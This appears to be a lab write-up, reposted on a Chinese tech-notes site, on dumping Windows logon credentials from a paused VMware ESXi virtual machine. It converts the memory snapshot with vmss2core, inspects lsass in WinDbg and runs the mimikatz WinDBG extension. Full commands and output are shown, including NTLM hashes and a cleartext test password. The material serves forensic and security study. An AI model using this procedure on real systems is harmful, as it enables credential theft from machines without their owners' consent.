登录
当前位置: 首页 > 工具软件 > Open Virtual Machine Tools > 使用案例 >

[VM]Get Password from Virtual Machine Memory

狄富
2023-12-01

Env.

Virtual Machine

Target VM : win7x86 ( Build 7600) Based on ESXi 5.0
Process VM : Windows 7 SP1 x86 Build 7601

Tools

NameVersion
vmss2core-Linux64January 13, 2017 v1.0.1
WinDbg6.11.0001.404 x86
WinSCP5.9.3 Build 7136
mimilib.dllwin32 from mimikatz_trunk2.1 20160229

Step

Get dmp file

  1. Pause the Running Target VM.
  2. Copy vmss2core-Linux64 to ESXi (/vmfs/volumes/…/win7x86/) with WinSCP.
  3. Use vmss2core to convert win7x86-xxx.vmss into a dmp file(memory.dmp).
  4. Copy memory.dmp to Process VM (c:/vmss/) with WinSCP.
/vmfs/volumes/589af095-50718614-d536-005056881c2e/win7x86 # ./vmss2core-Linux64 -W7600 "win7x86-bfdbf0ed.vmss"
vmss2core version 8437677 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
Win32: found DDB at PA 0x2779be8
Win32: MmPfnDatabase=0x827b9700
Win32: PsLoadedModuleList=0x82799810
Win32: PsActiveProcessHead=0x82791e98
Win32: KiBugcheckData=0x827b1a00
Win32: KernBase=0x82651000

Win32: NtBuildLab=0x826a1068
CoreDumpScanWin32: MinorVersion set to 7600
... 10 MBs written.
... 20 MBs written.
... 30 MBs written.
...
... 1010 MBs written.
... 1020 MBs written.
Finished writing core.

Locate lsass process

  1. Load the dump file into WinDbg (File -> Open Crash Dump).
  2. Load symbols by following command.
  3. Locate and Switch lsass process by following command.
kd> .sympath SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
kd> .reload
Loading Kernel Symbols
...................................................
Loading User Symbols
...................................................
Loading unloaded module list
......
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll - 

kd> !process 0 0 lsass.exe
PROCESS 85d37a68  SessionId: 0  Cid: 0204    Peb: 7ffd8000  ParentCid: 0194
    DirBase: 3eab20e0  ObjectTable: 96371e60  HandleCount: 564.
    Image: lsass.exe

kd> .process /r /p 85d37a68
Implicit process is now 85d37a68
Loading User Symbols
..............................................................

Get password

  1. Load the mimilib.dll file.
  2. Run mimikatz.
kd> .load C:\vmss\mimilib.dll

  .#####.   mimikatz 2.0 alpha (x86) built on Feb 29 2016 03:03:51
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7600
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

kd> !mimikatz

DPAPI Backup keys
=================

Current prefered key:       

Compatibility prefered key: 

SekurLSA
========

Authentication Id : 0 ; 618511 (00000000:0009700f)
Session           : Interactive from 1
User Name         : WIN7X86EN
Domain            : WIN7X86EN-PC
Logon Server      : WIN7X86EN-PC
Logon Time        : 2/24/2017 1:19:20 AM
SID               : S-1-5-21-2794451615-1102251730-2481481344-1000
    msv : 
     [00000003] Primary
     * Username : WIN7X86EN
     * Domain   : WIN7X86EN-PC
     * LM       : 16a5d217f7c9c7befdcfc2afb2d1be34
     * NTLM     : a91a49a72e7cf292cdad1bffdead9fd3
     * SHA1     : e4496b25c5afb22a92d28dadecb7d5873e920b6e
    tspkg : 
     * Username : WIN7X86EN
     * Domain   : WIN7X86EN-PC
     * Password : mypassword
    wdigest : 
     * Username : WIN7X86EN
     * Domain   : WIN7X86EN-PC
     * Password : mypassword
    kerberos : 
     * Username : WIN7X86EN
     * Domain   : WIN7X86EN-PC
     * Password : mypassword
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       a91a49a72e7cf292cdad1bffdead9fd3
       rc4_hmac_old      a91a49a72e7cf292cdad1bffdead9fd3
       rc4_md4           a91a49a72e7cf292cdad1bffdead9fd3
       rc4_hmac_nt_exp   a91a49a72e7cf292cdad1bffdead9fd3
       rc4_hmac_old_exp  a91a49a72e7cf292cdad1bffdead9fd3

    ssp : 
    masterkey : 
    credman :

Refer

Mimikatz Against Virtual Machine Memory Part 1
Mimikatz Against Virtual Machine Memory Part 2

 类似资料:

相关阅读

它不会创建Java VM(JNI)Java VM EXCEPTION_ACCESS_VIOLATION的可能原因?NodeJs中的VM模块详解android-studio 自定义VM选项Docker与VM和LXC的关系

相关文章

相关问答

Kubernetes ( Azure VM ) change node ip使用JavaSDK监视Azure VMjava vm初始化错误VM不可见JavaFX模块启动Mac时Android VM崩溃
快捷导航: 新手教程 算法原理 架构设计 Java进阶 数据库进阶 大厂专栏 面试经验 编程笔记 编程问答 所有专题 文档资料 工具软件 电子书籍 小牛导航
在线工具: 房贷计算器 个税计算器 Linux命令查询 Json格式化 正则表达式 颜色转换 AES加解密 SHA1加密 MD5加密 毒鸡汤 字数统计 随机密码生成 进制转换 Base64编解码 励志句子
Copyright © 2019-2024 小牛知识库@xnip.cn. All Rights Reserved.